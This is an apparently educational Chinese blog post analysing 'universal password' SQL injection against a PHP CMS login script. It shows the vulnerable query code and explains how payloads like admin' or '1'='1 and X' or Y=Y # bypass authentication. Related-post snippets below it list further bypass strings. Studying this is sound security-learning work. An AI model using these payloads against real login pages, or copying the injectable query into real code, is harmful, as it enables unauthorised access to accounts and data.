万能用户名(密码)原理分析

于 2023-08-23 14:51:11 发布
阅读量653 收藏
点赞数 1
分类专栏: SQL_practice 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/have_a_great_day/article/details/132450979
版权

目录

分析后端登陆源代码:

万能命令1:

已知用户名情况下:

万能命令2

用户名和密码的未知情况下:

原理分析:

分析后端登陆源代码:

  • 后端源代码在【.\phpStudy\WWW\cms\admin\login.action.php】中。
  • 运算符优先级:and>or
  • 第二十行 --- 搜索与cms_users(数据库)相匹配的账号与密码。

 --- 【.$username.】--- 接收前端登录框账号的位置。

 --- 【.md5 ( $password .】--- 接收前端登录框密码的位置。

如下图是登陆界面的源代码: 

<?php
session_start ();
header('Content-Type: text/html; charset=utf-8');
include_once ("../include/config.inc.php");
if (isset ( $_POST ["username"] )) {
	$username = $_POST ["username"];
} else {
	$username = "";
}
if (isset ( $_POST ["password"] )) {
	$password = $_POST ["password"];
} else {
	$password = "";
}
//记住用户名
setcookie (username, $username,time()+3600*24*365);
if (empty($username)||empty($password)){
	exit("<script>alert('用户名或密码不能为空!');window.history.go(-1)</script>");
}
$user_row = $db->getOneRow("select userid from cms_users where username = '".$username."' and password='".md5 ( $password ) ."'");
if (!empty($user_row )) {
	setcookie (userid, $user_row ['userid'] ); 
	header("Location: index.php");
}else{
	exit("<script>alert('用户名或密码不正确!');window.history.go(-1)</script>");
}
?>

万能命令1:

已知用户名情况下:
已知的用户名' or 'X' ='X       // X:表示有理数
"select userid from cms_users where username = '".$username."' and password='".md5 ( $password ) ."'");
  • 将第一条代码输入到用户名,密码随机输入,后端数据库代码将会如下所示。
"...'".$username."' and password='".md5 ( $password ) ."'");
.$username. --- 变成 admin' or '1'='1
.md5 ( $password ) . --- 变成 123    合并如下式
'admin' or '1'='1' and '123';    //"" 在数据库中为表示扩住的为字符串
已知优先级 and > or    // and(与运算):同真为真,有假则假                                                       or(或运算):有真则真,同假则假
'1'='1' and '123' //左对右错,不清楚密码,密码乱输的,所以结果为 False
'admin' or False //用户名是正确的,所以格式为 Ture or False --- 有真则真
所以最后数据库得出来的结果为正确的,于是登录成功

此处为版本问题,无需理会

 

万能命令2

用户名和密码的未知情况下:
X' or Y=Y #      //X --- 未知的用户名  Y --- 有理数
"select userid from cms_users where username = '".$username."' and password='".md5 ( $password ) ."'");
  • 在登录界面,随机输入用户名和密码,后端数据库代码将会如下所示。
"...'".$username."' and password='".md5 ( $password ) ."'");
.$username. --- 变成 X' or 'Y'='Y #
.md5 ( $password ) . --- 变成 123123    合并如下式
'Zeus' or -1=-1 #' and '123';    //"" 在数据库中为表示扩住的为字符串   # 在数据库中表示注释 
,# 后面的代码全部当做注释,于是密码部分被注释掉了,只剩下前部分 or(或运算)部分
'Zeus' or -1=-1 #' and '123';  //用户名为假,-1=-1 为真
False or ture; //or(或运算):有真则真,同假则假
所以最后数据库得出来的结果为正确的,于是登录成功

原理分析:

通过两个例子可知,万能式子是利用后端代码与数据库交互的漏洞,并结合运算符算法,使最后的结果输出为真。

懒羊羊安全
关注
专栏目录
SQL注入之万能用户名
m0_56578216的博客
08-22 748
这段代码先用select语句做了数据库的查询操作,查询用户输入的用户名密码密码做md5加密),然后将查询的结果给if语句做判断,如果根据用户名密码不为空且能查到userid,就登录成功;否则,输出**“用户名密码不正确”**。
html5判断用输入密码,CTF中Web密码绕过(特殊的万能密码绕过)详解
weixin_29144347的博客
06-05 2814
可能做过CTF题的朋友们,都有一定的了解过Web登陆密码绕过这种类型的题目,绕过的方法也有很多,层次不穷,今天帮朋友的时候也遇到了这类型的题目,但是又非常的特别,网络上也是很少见的,特意分享出来一下。题目:admin的密码非常长,但是有最短的方式绕过。前台代码:admin的密码非常长,但是有最短的方式绕过绕过方法:这里用到的是SQL注入万能密码绕过:用户名为:admin,密码为:'='。原理原理...
PHP万能登陆密码
03-21
PHP万能登陆密码,涵盖了所有的万能类型,值得收藏
万能密码 php,PHP 万能密码
weixin_31180441的博客
03-09 2676
PHP 万能密码说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是百分之百可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了PHP注入。其实说这话的人没有好好想过,更没有尝试过用万能密码PHP的后台。其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。如果你用这样的万能密码'or'='or',当然进不去,理由是GPC开启的时候单...
PHP代码审计入门-万能密码入门分析
身高两米不到的博客
10-23 1057
从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有简单的html基础和php基础,跟随流沙前辈视频学习记录。常用手段是对于用户输入的字符串进行严格过滤,这里代码仅使用了addslashes()用于过滤,其实该函数也是存在绕过风险的,但我们的目的是学习,馒头得一口一口吃。-- 这时注释(要空格)个人已搭建好环境进行测试,这里仅演示代码,这里使用了phpstorm工具,具体下载及破解自行解决。本章开始,进入代码审计的世界。
【学术探讨】万能密码原理剖析
最新发布
wangyuxiang946的博客
06-14 1万+
万能密码】,顾名思义,就是可以 【登录任意网站】的账号和密码,这篇文章就跟大家探讨一下,万能密码究竟是如何实现登录的。
万能密码 php,PHP万能密码
weixin_29012677的博客
03-09 753
说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是百分之百。可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了PHP注入。其实说这话的人没有好好想过,更没有尝试过用万能密码PHP的后台。其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。如果你用这样的万能密码'or'='or',当然进不去,理由是GPC开启的时候单引号会被转换。...
万能密码是什么_菜鸟必读
03-24
这样修改后的SQL语句,由于`'or'1'='1'`部分始终为真,因此会返回所有记录,而不是仅限于正确用户名密码的记录,从而实现了所谓的“万能密码”。 #### 防御措施 文章中还提到了几种防御SQL注入攻击的策略,包括...
菜鸟日记之SQL注入原理&万能密码注入
热门推荐
Blazar_star的博客
11-07 2万+
十一月二号,阴天,想听陈奕迅。 今天看到的这个还挺有意思的,SQL注入原理万能密码。 数据库老师只是随口带过的一句话没想到竟然是SQL注入的关键.....果然...有自己独立的思考才是最重要的。 --------------------------------------------------------------------------------------------------...
PHP万能密码
徐小西的专栏
01-20 1201
PHP安全方面的资料作了些收集和查阅,PHP注入首当其冲,一篇神秘小强的PHP万能密码写得不错,摘录:说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是百分之百。可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了PHP注入。其实说这话的人没有好好想过,更没有尝试过用万能密码PHP的后台。其实GPC魔术转换是否开启对用万能密码
php万能密码登陆
奕家
06-24 5524
''' 问题?后台登陆必须的账户和密码正确吗? 答:不一定是,看程序员写的代码如何,有没有做安全防范,程序都是人写的,人不是万能的,所以bug总会有的#嘛! 此时,万能登陆来了 ''' 1.用户正确密码正确: http://192.168.65.133/sqlserver/login.aspx 密码正确的数据库语句 select * from Admin where name='yuan' and passWord='123' 登录成功! 2.用户正确密码...
php万能后台密码,Key神-万能CMS网站后台密码重设工具
weixin_42501892的博客
03-13 417
“Key神-万能密码重设工具”为安全联盟站长平台为了解决长期困恼站长们的一个世纪难题:“我忘记后台密码了!怎么办?”而诞生的!本程序采用了“云端”更新技术,可自动识别网站程序。站长只需要简单将程序下载并上传到网站跟目录下,输入密码即可修改网站后台管理员密码。自从有了安全联盟“Key神”,嘛嘛再也不用担心我忘记后台管理密码了!更新日志:[更新纪录-2013.11.23]*新加destoob b2b、...
Bluecms v1.6万能密码登录后台
fansenliangren的博客
11-29 789
具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
PHP万能密码登陆
weixin_34262482的博客
09-26 1076
说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是     百分之百。     可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了     PHP注入。     其实说这话的人没有好好想过,更没有尝试过用万能密码PHP的后台。     其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。     如果你用这样的万...
php 万能密码,网络安全系列之十 万能密码登录网站后台
weixin_39969611的博客
03-11 862
在登录网站后台时,有一个比较古老的“万能密码”漏洞,即利用一个我们精心构造的用户名,即使不用输入密码,也可以登录后台,其原理仍属于SQL注入的范畴。假设数据库中存放用户信息的表是admin,其中存放用户名的字段是username,存放密码的字段是password,在用户验证页面中用来接收用户所输入的用户名密码的变量也分别是username和password,当用户在用户验证页面输入用户名密码后...
php 万能密码,万能用户名万能密码
weixin_42134554的博客
03-11 1035
万能用户名any’ union select * from user – (后面有个注释符)联合查询,是查询的结果大于1,为真万能用户名防御PDO$username=$REQUEST['usernm'];$password=$_REQUEST['passwd'];$pdo=new PDO("mssql:host=127.0.0.1;dbname=users","sa","root");$sql="...
分析PHP网站下的万能密码
weixin_34344677的博客
09-12 130
2019独角兽企业重金招聘Python工程师标准>>> ...
php万能密码在线视频讲解,万能密码
weixin_36118752的博客
03-22 95
asp万能密码‘or’=’or’aspx万能密码1: “or “a”=”a2: ‘)or(‘a’=’a3:or 1=1–4:’or 1=1–5:a’or’ 1=1–6: “or 1=1–7:’or’a’=’a8: “or”=”a’=’a9:’or”=’10:’or’=’or’11: 1 or ‘1’=’1’=112: 1 or ‘1’=’1′ or 1=113: ‘OR 1=1%0014: “or...
sql注入万能密码原理
04-03
SQL注入是一种攻击技术,通过在应用程序的输入字段中插入恶意的SQL代码,从而访问或修改数据库中的数据。SQL注入攻击的目标通常是登录系统,因为登录系统通常需要用户提供用户名密码SQL注入攻击的原理是利用应用程序的输入字段没有正确的验证和过滤,以及应用程序使用的SQL语句没有正确的参数化。攻击者可以在输入字段中插入特定的SQL代码,从而绕过用户名密码的验证,或者修改SQL语句的执行方式,以便访问或修改数据库中的数据。 万能密码是一种常见的SQL注入攻击技术,攻击者可以通过在用户名密码字段中插入特定的SQL代码,从而绕过用户名密码的验证。例如,攻击者可以在密码字段中输入'or 1=1--,这将使SQL语句执行为SELECT * FROM users WHERE username='username' AND password='' or 1=1--',其中'--'是SQL注释符,它将注释掉剩余的SQL语句。 因此,为了防止SQL注入攻击,应用程序必须正确的验证和过滤输入字段,并使用参数化的SQL语句来保护数据库中的数据。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值